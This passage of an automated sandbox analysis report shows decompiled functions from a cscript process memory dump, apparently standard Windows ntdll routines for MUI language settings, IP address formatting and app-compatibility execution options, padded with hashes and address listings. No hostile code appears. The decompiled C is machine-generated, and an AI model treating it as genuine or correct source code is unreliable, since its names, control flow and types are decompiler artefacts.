                                        • Instruction ID: 357f4258307286363ab1c25affd4b7884fdc40326dfea0adab1eef0f5a465e10
                                        • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                        • Instruction Fuzzy Hash: 4FD0A7717503083BEA10FAA8DC03F6632CC6B55B00F494064F94DD73C3E964F5008165
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 026126F8 Relevance: .0, Instructions: 44COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                        • Instruction ID: 5ba0e5472b8414b0852b4dc65b41c02ee252e0fb8d54a4835c085bf89e213404
                                        • Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
                                        • Instruction Fuzzy Hash: D7F022203241A99BDB08EA188CB0BBB33E6EF94300F5CC038ED49C7340E631F940C690
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02628788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 94%
                                        			E02628788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02628460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0260E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0262718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02628460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0262718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02628460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02628460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02628460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0262718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0260E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E02602340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0261E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0260E2A8(_t322,  &_v68, _v16);
								if(E02625553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0261E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0260E2A8(_t322,  &_v68, _t236);
								if(E02625553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0262718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0260E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E02602340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0261E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0260E2A8(_v12,  &_v68, _v16);
							if(E02625553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0261E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0260E2A8(_t322,  &_v68, _t269);
							if(E02625553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0262718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0260E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E02602340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0261E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0260E2A8(_v12,  &_v68, _v16);
						if(E02625553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0261E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0260E2A8(_t322,  &_v68, _t296);
						if(E02625553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0260E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}





































                                        0x02628788
                                        0x02628788
                                        0x02628791
                                        0x02628794
                                        0x02628798
                                        0x0262879b
                                        0x0262879e
                                        0x026287a1
                                        0x026287a4
                                        0x026287a7
                                        0x026287aa
                                        0x026287af
                                        0x02671ad3
                                        0x02628b0a
                                        0x02628b0d
                                        0x02628b13
                                        0x02628b19
                                        0x02628b1f
                                        0x02628b25
                                        0x02628b2b
                                        0x02628b31
                                        0x02628b37
                                        0x02628b3d
                                        0x02628b46
                                        0x02628b46
                                        0x026287c6
                                        0x026287d0
                                        0x02671ae0
                                        0x02671ae6
                                        0x02671af8
                                        0x02671af8
                                        0x02671afd
                                        0x02671afe
                                        0x02671b01
                                        0x02671b06
                                        0x02671b06
                                        0x026287d6
                                        0x026287f2
                                        0x026287f7
                                        0x02628807
                                        0x0262880a
                                        0x0262880f
                                        0x02628810
                                        0x02628813
                                        0x02628818
                                        0x02628818
                                        0x0262882c
                                        0x02628831
                                        0x02628838
                                        0x02628908
                                        0x02628920
                                        0x026289f0
                                        0x02628a08
                                        0x02628af6
                                        0x02628af6
                                        0x02628af8
                                        0x02628afb
                                        0x02671beb
                                        0x02671beb
                                        0x02628b04
                                        0x02671bf8
                                        0x02671c0e
                                        0x02671c13
                                        0x02671c16
                                        0x02671c16
                                        0x02671bf8
                                        0x00000000
                                        0x02628b04
                                        0x02628a0e
                                        0x02628a11
                                        0x02628a14
                                        0x02628a15
                                        0x02628a18
                                        0x02628a22
                                        0x02628b59
                                        0x02628a28
                                        0x02628a3c
                                        0x02628a3c
                                        0x02628a42
                                        0x02671bb0
                                        0x02671b11
                                        0x02671b11
                                        0x00000000
                                        0x02628a48
                                        0x02628a51
                                        0x02628a5b
                                        0x02628a5e
                                        0x02628a61
                                        0x02628a69
                                        0x02628a69
                                        0x02628a6d
                                        0x00000000
                                        0x00000000
                                        0x02628a74
                                        0x02628a7c
                                        0x02628a7d
                                        0x02628a91
                                        0x02628a93
                                        0x02628a93
                                        0x02628a98
                                        0x02628a9b
                                        0x02628aa1
                                        0x02628aa1
                                        0x02628aa4
                                        0x02628aaa
                                        0x02628ab1
                                        0x02628ac5
                                        0x02628ac7
                                        0x02628ac7
                                        0x02628ac5
                                        0x02628ace
                                        0x02671bc9
                                        0x02671bce
                                        0x02671bd2
                                        0x02671bd2
                                        0x02628ad8
                                        0x02628aeb
                                        0x02628aeb
                                        0x02628af0
                                        0x02628af4
                                        0x00000000
                                        0x02628af4
                                        0x02628a42
                                        0x02628926
                                        0x02628929
                                        0x0262892c
                                        0x0262892d
                                        0x02628930
                                        0x02628935
                                        0x0262893a
                                        0x02628b51
                                        0x02628940
                                        0x02628954
                                        0x02628954
                                        0x0262895a
                                        0x02671b63
                                        0x00000000
                                        0x02628960
                                        0x02628969
                                        0x02628973
                                        0x02628976
                                        0x02628979
                                        0x0262897e
                                        0x02628981
                                        0x02628981
                                        0x02628986
                                        0x00000000
                                        0x00000000
                                        0x02671b6e
                                        0x02671b74
                                        0x02671b7b
                                        0x02671b8f
                                        0x02671b91
                                        0x02671b91
                                        0x02671b99
                                        0x02671b9c
                                        0x02671ba2
                                        0x02671ba2
                                        0x0262898c
                                        0x02628992
                                        0x02628999
                                        0x026289ad
                                        0x02671ba8
                                        0x02671ba8
                                        0x026289ad
                                        0x026289b6
                                        0x026289c8
                                        0x026289cd
                                        0x026289d0
                                        0x026289d0
                                        0x026289d6
                                        0x026289e8
                                        0x026289e8
                                        0x026289ed
                                        0x00000000
                                        0x026289ed
                                        0x0262895a
                                        0x0262883e
                                        0x02628841
                                        0x02628844
                                        0x02628845
                                        0x02628848
                                        0x0262884d
                                        0x02628852
                                        0x02628b49
                                        0x02628858
                                        0x0262886c
                                        0x0262886c
                                        0x02628872
                                        0x02671b0e
                                        0x00000000
                                        0x02628878
                                        0x02628881
                                        0x0262888b
                                        0x0262888e
                                        0x02628891
                                        0x02628896
                                        0x02628899
                                        0x02628899
                                        0x0262889e
                                        0x00000000
                                        0x00000000
                                        0x02671b21
                                        0x02671b27
                                        0x02671b2e
                                        0x02671b42
                                        0x02671b44
                                        0x02671b44
                                        0x02671b4c
                                        0x02671b4f
                                        0x02671b55
                                        0x02671b55
                                        0x026288a4
                                        0x026288aa
                                        0x026288b1
                                        0x026288c5
                                        0x02671b5b
                                        0x02671b5b
                                        0x026288c5
                                        0x026288ce
                                        0x026288e0
                                        0x026288e5
                                        0x026288e8
                                        0x026288e8
                                        0x026288ee
                                        0x02628900
                                        0x02628900
                                        0x02628905
                                        0x00000000
                                        0x02628905

                                        APIs
                                        Strings
                                        • Kernel-MUI-Language-Disallowed, xrefs: 02628914
                                        • Kernel-MUI-Language-Allowed, xrefs: 02628827
                                        • Kernel-MUI-Language-SKU, xrefs: 026289FC
                                        • Kernel-MUI-Number-Allowed, xrefs: 026287E6
                                        • WindowsExcludedProcs, xrefs: 026287C1
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: _wcspbrk
                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                        • API String ID: 402402107-258546922
                                        • Opcode ID: da63cb58972162b308654ba0bf101ec3297e2a3bae5e78bda00bad383e99e688
                                        • Instruction ID: eace3d8aa45030289a047022898c41815a7e8e4160ae0943c8fda76399b77637
                                        • Opcode Fuzzy Hash: da63cb58972162b308654ba0bf101ec3297e2a3bae5e78bda00bad383e99e688
                                        • Instruction Fuzzy Hash: 49F104B2D00619EFCB15DF98C980DEEB7B9FF08304F14446AE906A7250E735AA45DF64
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 026413CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 38%
                                        			E026413CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E02637707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x2602926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E02637707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x2609cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E02637707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E02637707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E02637707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E02637707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                        0x026413d5
                                        0x026413d9
                                        0x026413dc
                                        0x026413de
                                        0x026413e1
                                        0x026413e8
                                        0x026413ee
                                        0x0266e8fd
                                        0x00000000
                                        0x0266e921
                                        0x0266e921
                                        0x0266e928
                                        0x0266e982
                                        0x0266e98a
                                        0x00000000
                                        0x0266e99a
                                        0x0266e99e
                                        0x0266e9a3
                                        0x0266e9a8
                                        0x0266e9b9
                                        0x0266e978
                                        0x00000000
                                        0x0266e978
                                        0x0266e98a
                                        0x0266e92a
                                        0x0266e931
                                        0x0266e944
                                        0x0266e944
                                        0x0266e950
                                        0x0266e954
                                        0x0266e959
                                        0x0266e95e
                                        0x0266e963
                                        0x0266e970
                                        0x00000000
                                        0x0266e975
                                        0x0266e93b
                                        0x0266e980
                                        0x00000000
                                        0x0266e980
                                        0x0266e942
                                        0x0266e94b
                                        0x00000000
                                        0x0266e94b
                                        0x00000000
                                        0x0266e942
                                        0x026413f4
                                        0x026413f4
                                        0x026413f9
                                        0x026413fc
                                        0x026413ff
                                        0x02641406
                                        0x0266e9cc
                                        0x0266e9d2
                                        0x0266e9d2
                                        0x0266e9cc
                                        0x0264140c
                                        0x02641411
                                        0x02641431
                                        0x0264143a
                                        0x0264143c
                                        0x0264143f
                                        0x0264143f
                                        0x02641442
                                        0x02641447
                                        0x026414a8
                                        0x026414ac
                                        0x0266e9e2
                                        0x0266e9e7
                                        0x0266e9ec
                                        0x0266ea05
                                        0x0266ea05
                                        0x00000000
                                        0x02641449
                                        0x00000000
                                        0x02641449
                                        0x0264144c
                                        0x02641459
                                        0x02641462
                                        0x02641469
                                        0x0264146a
                                        0x02641470
                                        0x02641473
                                        0x02641476
                                        0x02641476
                                        0x02641490
                                        0x02641495
                                        0x0264138e
                                        0x02641390
                                        0x02641397
                                        0x02641398
                                        0x02641399
                                        0x026413a1
                                        0x026413a4
                                        0x026413a4
                                        0x02641498
                                        0x0264149c
                                        0x0264149f
                                        0x026414a2
                                        0x00000000
                                        0x00000000
                                        0x026414a4
                                        0x00000000
                                        0x026414a4
                                        0x02641413
                                        0x02641415
                                        0x02641416
                                        0x02641419
                                        0x0264141c
                                        0x02641422
                                        0x026413b7
                                        0x026413bc
                                        0x026413bf
                                        0x026413bf
                                        0x026413c2
                                        0x02641424
                                        0x02641424
                                        0x02641424
                                        0x02641427
                                        0x0264142b
                                        0x0264142c
                                        0x0264142c
                                        0x0264142c
                                        0x00000000
                                        0x0264141c
                                        0x02641411

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.669430082.00000000025F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 025E0000, based on PE: true
                                        • Associated: 00000007.00000002.669421162.00000000025E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669517370.00000000026D0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669524373.00000000026E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669530863.00000000026E4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669537783.00000000026E7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669544839.00000000026F0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        • Associated: 00000007.00000002.669584383.0000000002750000.00000040.00000800.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_25e0000_cscript.jbxd
                                        Similarity
                                        • API ID: ___swprintf_l
                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                        • API String ID: 48624451-2108815105
                                        • Opcode ID: 379d04e229d7ed4d992216dd065fb89455c5444ace52a6cb9bc0a1195e466543
                                        • Instruction ID: e3c523d8c7207fe5f39c9cdcf520badd26dce28e8e9bc17b084164078f31d13f
                                        • Opcode Fuzzy Hash: 379d04e229d7ed4d992216dd065fb89455c5444ace52a6cb9bc0a1195e466543
                                        • Instruction Fuzzy Hash: BB617EB5D00655E6CF39CF59C8809BFBBB6EF85304B44C16DE4EA47680DB35A680CB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 02637EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E02637EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x26e2088; // 0x7616febc
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E02637F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02653F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E0260DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x26e4218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02653F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E02610D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02653F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E02618375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02653F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0267E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02653F92();
					_t38 = 1;
					L2:
					return E0260E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                        0x02637f08
                                        0x02637f0f
                                        0x02637f12
                                        0x02637f1b
                                        0x02637f31
                                        0x02653ead
                                        0x02653eb4
                                        0x00000000
                                        0x00000000
                                        0x02653eba
                                        0x02653ecd
                                        0x02653ed2
                                        0x02653ee1
                                        0x02653ee7
                                        0x02653eec
                                        0x02653f12
                                        0x02653f18
                                        0x02653f1a
                                        0x00000000
                                        0x00000000
                                        0x02653f20
                                        0x02653f26
                                        0x02653f28
                                        0x00000000
                                        0x00000000
                                        0x02653f2e
                                        0x02653f30
                                        0x00000000
                                        0x00000000
                                        0x02653f3a
                                        0x02653f3b
                                        0x02653f53
                                        0x02653f64
                                        0x02653f69
                                        0x02653f6c
                                        0x02653f6d
                                        0x02653f6f
                                        0x0265e304
                                        0x0265e30f
                                        0x0265e315
                                        0x0265e31e
                                        0x0265e321
                                        0x0265e327
                                        0x0265e329
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0265e32f
                                        0x0265e32f
                                        0x0265e337
                                        0x0265e33a
                                        0x0265e33b
                                        0x0265e33d
                                        0x0265e33f
                                        0x0265e341
                                        0x0265e341
                                        0x0265e34e
                                        0x0265e353
                                        0x0265e358
                                        0x0265e35d
                                        0x0265e35f
                                        0x00000000
                                        0x00000000
                                        0x0265e365
                                        0x0265e365
                                        0x0265e368
                                        0x0265e36e
                                        0x00000000
                                        0x00000000
                                        0x0265e374
                                        0x0265e32f
                                        0x02653f75
